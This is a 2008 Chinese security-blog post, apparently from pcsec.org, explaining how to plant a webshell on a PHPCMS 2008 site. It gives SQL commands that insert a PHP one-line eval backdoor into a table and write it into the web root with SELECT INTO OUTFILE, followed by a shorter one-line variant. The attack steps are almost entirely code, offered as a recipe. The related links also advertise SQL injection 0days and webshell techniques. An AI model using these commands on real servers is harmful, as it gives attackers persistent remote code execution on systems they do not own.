HOW TO GET PHPCMS2008 WEBSHELL-Web安全手册

导航

分享本身就是件快乐的事我因别人得到帮助而感到幸福

HOW TO GET PHPCMS2008 WEBSHELL

2008年11月20日 16:10:36 发布:Trace

Posted by 小拳头

进去后

SQL代码

Create TABLE b (cmd text NOT NULL);

SQL代码

Insert INTO b (cmd) VALUES('<?php @eval($_POST[cmd]);?>');

//在字段cmd中插入一句话木马，木马内容为

PHP代码

<?php @eval($_POST[cmd]);?>

前3句都尅执行成功最后一句执行后显示空白

SQL代码

select cmd from b into outfile 'E:\wwwroot\phpcms\phpcms\shell.php';

Tr4c3注：很早以前在phpmyadmin得webshell的方法,这样写太冗繁了，用下面的一句就可以了。

SELECT "<?eval($_POST[cmd]);" INTO OUTFILE 'E:\\wwwroot\\phpcms\\phpcms\\shell.php';

Tags: PhpCms webshell

相关文章:
艰难的在webshell中执行程序  (2008-11-14 7:53:59)
PhpCms2007 sp6 SQL injection 0day (wenba)  (2008-11-10 9:58:37)
犀利的 oracle 注入技术  (2008-10-17 17:27:56)
新型 .net 一句话及客户端  (2008-10-13 17:7:18)
超强的内网渗透跳板webshell  (2008-10-13 12:4:48)
ORACLE 建立数据文件WriteWebShell  (2008-10-12 12:42:42)
PhpCms2007 sp6 SQL injection 0day  (2008-10-2 1:17:6)

◎欢迎参与讨论，请在这里发表您的看法、交流您的观点。

Powered By Z-Blog .Theme from Google黑板报 By Washun

Copyright 2008-2009 Pcsec.org. Some Rights Reserved.苏ICP备08110306号

Search

网站分类

文章归档

最新评论及回复

最近发表